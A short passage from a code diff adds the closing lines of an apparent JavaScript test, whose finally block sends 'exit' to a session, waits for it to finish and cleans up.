+  } finally {
+    await c.submit('exit'); await c.done; c.cleanup();
+  }
+});